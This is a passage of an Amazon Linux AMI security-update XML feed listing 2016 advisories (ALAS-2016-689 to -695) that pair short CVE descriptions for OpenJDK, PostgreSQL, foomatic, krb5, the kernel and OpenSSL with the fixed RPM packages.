/><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3427:
It was discovered that the RMI server implementation in the JMX component in OpenJDK did not restrict which classes can be deserialized when deserializing authentication credentials. A remote, unauthenticated attacker able to connect to a JMX port could possibly use this flaw to trigger deserialization flaws.
1328210:
CVE-2016-3427 OpenJDK: unrestricted deserialization of authentication credentials (JMX, 8144430)
CVE-2016-3426:
1328059:
CVE-2016-3426 OpenJDK: non-constant time GCM authentication tag comparison (JCE, 8143945)
CVE-2016-3425:
It was discovered that the JAXP component in OpenJDK failed to properly handle Unicode surrogate pairs used as part of the XML attribute values. Specially crafted XML input could cause a Java application to use an excessive amount of memory when parsed.
1328040:
CVE-2016-3425 OpenJDK: incorrect handling of surrogate pairs in XML attribute values (JAXP, 8143167)
CVE-2016-0695:
It was discovered that the Security component in OpenJDK failed to check the digest algorithm strength when generating DSA signatures. The use of a digest weaker than the key strength could lead to the generation of signatures that were weaker than expected.
1328022:
CVE-2016-0695 OpenJDK: insufficient DSA key parameters checks (Security, 8138593)
CVE-2016-0687:
1327749:
CVE-2016-0687 OpenJDK: insufficient byte type checks (Hotspot, 8132051)
CVE-2016-0686:
1327743:
CVE-2016-0686 OpenJDK: insufficient thread consistency checks in ObjectInputStream (Serialization, 8129952)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0686" title="" id="CVE-2016-0686" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0687" title="" id="CVE-2016-0687" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0695" title="" id="CVE-2016-0695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3425" title="" id="CVE-2016-3425" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3426" title="" id="CVE-2016-3426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3427" title="" id="CVE-2016-3427" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.91-0.b14.10.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.91-0.b14.10.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.91" release="0.b14.10.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.91-0.b14.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-689</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-689: important priority package update for postgresql8</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0773:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the PostgreSQL handling code for regular expressions. A remote attacker could use a specially crafted regular expression to cause PostgreSQL to crash or possibly execute arbitrary code.
1303832:
CVE-2016-0773 postgresql: case insensitive range handling integer overflow leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0773" title="" id="CVE-2016-0773" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-libs" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="5.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-5.52.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-5.52.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="5.52.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-5.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-690</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-690: medium priority package update for foomatic</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8560:
It was discovered that foomatic-rip failed to remove all shell special characters from inputs used to construct command lines for external programs run by the filter. An attacker could possibly use this flaw to execute arbitrary commands.
1291227:
CVE-2015-8560 cups-filters: foomatic-rip did not consider semicolon as illegal shell escape character
CVE-2010-5325:
It was discovered that the unhtmlify() function of foomatic-rip did not correctly calculate buffer sizes, possibly leading to a heap-based memory corruption. A malicious attacker could exploit this flaw to cause foomatic-rip to crash or, possibly, execute arbitrary code.
1218297:
CVE-2010-5325 foomatic: potential remote arbitrary code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5325" title="" id="CVE-2010-5325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8560" title="" id="CVE-2015-8560" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="foomatic" version="4.0.4" release="5.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/foomatic-4.0.4-5.11.amzn1.x86_64.rpm</filename></package><package name="foomatic-debuginfo" version="4.0.4" release="5.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/foomatic-debuginfo-4.0.4-5.11.amzn1.x86_64.rpm</filename></package><package name="foomatic-debuginfo" version="4.0.4" release="5.11.amzn1" epoch="0" arch="i686"><filename>Packages/foomatic-debuginfo-4.0.4-5.11.amzn1.i686.rpm</filename></package><package name="foomatic" version="4.0.4" release="5.11.amzn1" epoch="0" arch="i686"><filename>Packages/foomatic-4.0.4-5.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-691</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-691: medium priority package update for krb5</title><issued date="2016-04-21 16:00:00" /><updated date="2016-04-21 16:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8631:
A memory leak flaw was found in the krb5_unparse_name() function of the MIT Kerberos kadmind service. An authenticated attacker could repeatedly send specially crafted requests to the server, which could cause the server to consume large amounts of memory resources, ultimately leading to a denial of service due to memory exhaustion.
1302642:
CVE-2015-8631 krb5: Memory leak caused by supplying a null principal name in request
CVE-2015-8630:
A NULL pointer dereference flaw was found in the procedure used by the MIT Kerberos kadmind service to store policies: the kadm5_create_principal_3() and kadm5_modify_principal() function did not ensure that a policy was given when KADM5_POLICY was set. An authenticated attacker with permissions to modify the database could use this flaw to add or modify a principal with a policy set to NULL, causing the kadmind service to crash.
1302632:
CVE-2015-8630 krb5: krb5 doesn't check for null policy when KADM5_POLICY is set in the mask
CVE-2015-8629:
An out-of-bounds read flaw was found in the kadmind service of MIT Kerberos. An authenticated attacker could send a maliciously crafted message to force kadmind to read beyond the end of allocated memory, and write the memory contents to the KDC database if the attacker has write permission, leading to information disclosure.
1302617:
CVE-2015-8629 krb5: xdr_nullstring() doesn't check for terminating null character
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8629" title="" id="CVE-2015-8629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8630" title="" id="CVE-2015-8630" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8631" title="" id="CVE-2015-8631" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-workstation" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.13.2" release="12.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.13.2-12.40.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.13.2-12.40.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.13.2" release="12.40.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.13.2-12.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-692</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-692: important priority package update for apache-commons-collections</title><issued date="2016-04-27 16:15:00" /><updated date="2016-04-27 16:15:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apache-commons-collections-javadoc" version="3.2.2" release="3.10.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-javadoc-3.2.2-3.10.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections" version="3.2.2" release="3.10.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-3.2.2-3.10.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections-testframework" version="3.2.2" release="3.10.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-testframework-3.2.2-3.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-693</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-693: critical priority package update for java-1.7.0-openjdk</title><issued date="2016-04-27 16:15:00" /><updated date="2016-04-27 16:15:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3427:
It was discovered that the RMI server implementation in the JMX component in OpenJDK did not restrict which classes can be deserialized when deserializing authentication credentials. A remote, unauthenticated attacker able to connect to a JMX port could possibly use this flaw to trigger deserialization flaws.
1328210:
CVE-2016-3427 OpenJDK: unrestricted deserialization of authentication credentials (JMX, 8144430)
CVE-2016-3425:
It was discovered that the JAXP component in OpenJDK failed to properly handle Unicode surrogate pairs used as part of the XML attribute values. Specially crafted XML input could cause a Java application to use an excessive amount of memory when parsed.
1328040:
CVE-2016-3425 OpenJDK: incorrect handling of surrogate pairs in XML attribute values (JAXP, 8143167)
CVE-2016-0695:
It was discovered that the Security component in OpenJDK failed to check the digest algorithm strength when generating DSA signatures. The use of a digest weaker than the key strength could lead to the generation of signatures that were weaker than expected.
1328022:
CVE-2016-0695 OpenJDK: insufficient DSA key parameters checks (Security, 8138593)
CVE-2016-0687:
1327749:
CVE-2016-0687 OpenJDK: insufficient byte type checks (Hotspot, 8132051)
CVE-2016-0686:
1327743:
CVE-2016-0686 OpenJDK: insufficient thread consistency checks in ObjectInputStream (Serialization, 8129952)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0686" title="" id="CVE-2016-0686" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0687" title="" id="CVE-2016-0687" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0695" title="" id="CVE-2016-0695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3425" title="" id="CVE-2016-3425" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3427" title="" id="CVE-2016-3427" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.101-2.6.6.1.67.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.101-2.6.6.1.67.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.101" release="2.6.6.1.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.101-2.6.6.1.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-694</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-694: medium priority package update for kernel</title><issued date="2016-04-27 16:15:00" /><updated date="2017-01-19 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7117:
A use-after-free vulnerability was found in the kernel&#039;s socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.
1382268:
CVE-2016-7117 kernel: Use-after-free in the recvmmsg exit path
CVE-2016-3672:
1324749:
CVE-2016-3672 kernel: unlimiting the stack disables ASLR
CVE-2016-3156:
1318172:
CVE-2016-3156 kernel: ipv4: denial of service when destroying a network interface
CVE-2016-3135:
1317386:
CVE-2016-3135 kernel: netfilter: size overflow in x_tables
CVE-2016-3134:
1317383:
CVE-2016-3134 kernel: netfilter: missing bounds check in ipt_entry structure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3134" title="" id="CVE-2016-3134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3135" title="" id="CVE-2016-3135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3156" title="" id="CVE-2016-3156" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3672" title="" id="CVE-2016-3672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7117" title="" id="CVE-2016-7117" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.8" release="20.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.8-20.46.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-695</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-695: important priority package update for openssl</title><issued date="2016-05-03 10:30:00" /><updated date="2016-05-03 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2109:
1330101:
CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data
CVE-2016-2108:
CVE-2016-2107:
CVE-2016-2106:
CVE-2016-2105:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2105" title="" id="CVE-2016-2105" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2106" title="" id="CVE-2016-2106" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107" title="" id="CVE-2016-2107" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2108" title="" id="CVE-2016-2108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2109" title="" id="CVE-2016-2109" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-14.91.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="14.91.amzn1" epoch="1" 